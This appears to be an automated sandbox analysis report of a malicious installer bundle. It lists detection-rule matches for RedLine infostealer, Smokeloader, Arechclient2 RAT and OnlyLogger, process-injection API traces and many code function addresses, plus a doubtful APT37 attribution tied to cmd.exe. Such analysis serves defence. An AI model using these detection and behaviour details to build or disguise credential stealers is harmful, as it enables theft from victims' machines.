                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 00000018.00000002.1990631383.0000000001700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000001D.00000002.4154666399.000000000184F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 0000001A.00000002.4148584124.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 0000001A.00000002.4146777079.0000000000400000.00000040.00000001.01000000.00000016.sdmp, type: MEMORYMatched rule: Detects OnlyLogger loader variants Author: ditekSHen
                  Source: 0000001D.00000002.4147517573.0000000000400000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000018.00000002.1993787131.0000000001841000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                  Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                  Source: 0000001D.00000002.4153571482.00000000017F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 00000018.00000002.1990867892.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000001A.00000003.1792106569.0000000001880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects OnlyLogger loader variants Author: ditekSHen
                  Source: 00000018.00000002.1993661791.000000000176E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0000002F.00000002.4156074692.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000001A.00000002.4154343968.0000000001A2F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                  Source: 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unknown loader / injector Author: ditekSHen
                  Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                  Source: 0000001D.00000003.1777699508.0000000003140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
                  Source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 7892, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: Mon17948100733a95c58.exe PID: 8056, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: Mon179e1058f256.exe PID: 8164, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: Process Memory Space: Mon17eac6d534bfd22c7.exe PID: 1308, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\libcurlpp.dll, type: DROPPEDMatched rule: Detects unknown loader / injector Author: ditekSHen
                  Source: C:\Windows\SysWOW64\cmd.exeDropped file: MD5: ac6ad5d9b99757c3a878f2d275ace198 Family: APT37 Alias: Reaper group, Geumseong121, Group 123, Scarcruft, APT-S-008, Red Eyes, TEMP.Reaper, Ricochet Chollima, sun team, APT37 Description: APT37 is a suspected North Korean cyber espionage group that has been in operation since at least 2012. Their targets are primarily located in South Korea, but also Japan, Vietnam, Russia, China, India, and some of the countries in the Middle East. A wider range of industries are affected, including chemicals, electronics, manufacturing, aerospace, automotive and healthcare entities References: https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf https://securelist.com/operation-daybreak/75100/https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
                  Source: Mon17948100733a95c58.exe.1.dr, ComposerRequestClass.csLarge array initialization: ValidateProcess: array initializer size 206202
                  Source: Mon17eac6d534bfd22c7.exe.1.dr, Container.csLarge array initialization: ViewPrototype: array initializer size 211888
                  Source: Mon1795d04d4bd.exe.1.drStatic PE information: section name: [$vdPf#
                  Source: libcurl.dll.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libcurlpp.dll.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: libstdc++-6.dll.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Mon1795d04d4bd.exe.1.drStatic PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_05516220 NtUnmapViewOfSection,14_2_05516220
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_055162D8 NtAllocateVirtualMemory,14_2_055162D8
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_05516218 NtUnmapViewOfSection,14_2_05516218
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_055162D0 NtAllocateVirtualMemory,14_2_055162D0
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_00406C5B0_2_00406C5B
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_0040BD851_2_0040BD85
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_004031011_2_00403101
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_004101381_2_00410138
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_004192A11_2_004192A1
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_0041937B1_2_0041937B
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_00416C701_2_00416C70
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_004165361_2_00416536
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_00417EC01_2_00417EC0
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeCode function: 1_2_00413ED01_2_00413ED0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0043C0202_2_0043C020
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004521F02_2_004521F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0040C2702_2_0040C270
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004422D02_2_004422D0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004443902_2_00444390
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0040E5202_2_0040E520
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0043E5D02_2_0043E5D0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0042E6A02_2_0042E6A0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004348502_2_00434850
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004109102_2_00410910
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0043CB202_2_0043CB20
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00432BE02_2_00432BE0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0043ED602_2_0043ED60
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00442D902_2_00442D90
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0044F1F02_2_0044F1F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004152602_2_00415260
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004134F02_2_004134F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0043F5102_2_0043F510
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0043D5D02_2_0043D5D0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0043B5F02_2_0043B5F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004355902_2_00435590
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004177302_2_00417730
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004438402_2_00443840
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004418202_2_00441820
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_004338F02_2_004338F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00447B602_2_00447B60
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00431BC02_2_00431BC0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00411C402_2_00411C40
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0040DCC02_2_0040DCC0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_0040DC802_2_0040DC80
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00415D002_2_00415D00
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_00419EA02_2_00419EA0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_6494A5A02_2_6494A5A0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_64948E302_2_64948E30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeCode function: 2_2_6494B4A02_2_6494B4A0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_02BFB95014_2_02BFB950
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_02BFE26814_2_02BFE268
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_02BFE9E814_2_02BFE9E8
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_055118D814_2_055118D8
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_05513A5014_2_05513A50
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_055A851014_2_055A8510
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_055AA7B814_2_055AA7B8
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_055AD67814_2_055AD678
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_055A917814_2_055A9178
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeCode function: 14_2_055ACF1014_2_055ACF10
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeCode function: 18_2_0085D6E518_2_0085D6E5
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F668E6019_2_00007FF72F668E60
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5D2E3019_2_00007FF72F5D2E30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5CCD7019_2_00007FF72F5CCD70
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5C142019_2_00007FF72F5C1420
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F62F04019_2_00007FF72F62F040
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F62D11019_2_00007FF72F62D110
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F4F9019_2_00007FF72F5F4F90
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6B2F8419_2_00007FF72F6B2F84
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F1F6019_2_00007FF72F5F1F60
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5FCF3019_2_00007FF72F5FCF30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F65EF0019_2_00007FF72F65EF00
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F643D3019_2_00007FF72F643D30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F627DD019_2_00007FF72F627DD0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F633DA019_2_00007FF72F633DA0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F614C7019_2_00007FF72F614C70
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F64FC4019_2_00007FF72F64FC40
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6B2CF019_2_00007FF72F6B2CF0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F9CC019_2_00007FF72F5F9CC0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F61FCC019_2_00007FF72F61FCC0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F640B8019_2_00007FF72F640B80
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5E9B7019_2_00007FF72F5E9B70
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F641B4019_2_00007FF72F641B40
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F7C0019_2_00007FF72F5F7C00
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6B2C0C19_2_00007FF72F6B2C0C
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5E4BF019_2_00007FF72F5E4BF0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5CBA7019_2_00007FF72F5CBA70
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F62DA5019_2_00007FF72F62DA50
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5FEAD019_2_00007FF72F5FEAD0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F65499019_2_00007FF72F654990
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6AC93019_2_00007FF72F6AC930
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F693019_2_00007FF72F5F6930
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F63492019_2_00007FF72F634920
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F63F9C019_2_00007FF72F63F9C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F61B8F019_2_00007FF72F61B8F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6238E019_2_00007FF72F6238E0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5FD78019_2_00007FF72F5FD780
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6AD7DC19_2_00007FF72F6AD7DC
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F62767019_2_00007FF72F627670
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F65562019_2_00007FF72F655620
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F61C71019_2_00007FF72F61C710
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6B36A419_2_00007FF72F6B36A4
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F60758019_2_00007FF72F607580
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F64758019_2_00007FF72F647580
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5E256019_2_00007FF72F5E2560
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F356019_2_00007FF72F5F3560
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F655019_2_00007FF72F5F6550
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F65261019_2_00007FF72F652610
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5E761019_2_00007FF72F5E7610
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6A85E419_2_00007FF72F6A85E4
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F60246019_2_00007FF72F602460
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6534C019_2_00007FF72F6534C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5E84A019_2_00007FF72F5E84A0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F60F4B019_2_00007FF72F60F4B0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F64D39019_2_00007FF72F64D390
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F63F38019_2_00007FF72F63F380
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F65636019_2_00007FF72F656360
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F61E35019_2_00007FF72F61E350
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F63032019_2_00007FF72F630320
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6A63DC19_2_00007FF72F6A63DC
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F64C3F019_2_00007FF72F64C3F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6A63DC19_2_00007FF72F6A63DC
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5E43C019_2_00007FF72F5E43C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5FF3B019_2_00007FF72F5FF3B0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F33B019_2_00007FF72F5F33B0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5FA2E019_2_00007FF72F5FA2E0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6232C019_2_00007FF72F6232C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6152C019_2_00007FF72F6152C0
